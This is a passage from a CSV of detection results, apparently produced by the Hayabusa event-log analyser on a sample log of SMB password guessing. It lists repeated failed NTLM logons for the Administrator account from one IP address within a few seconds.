+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 
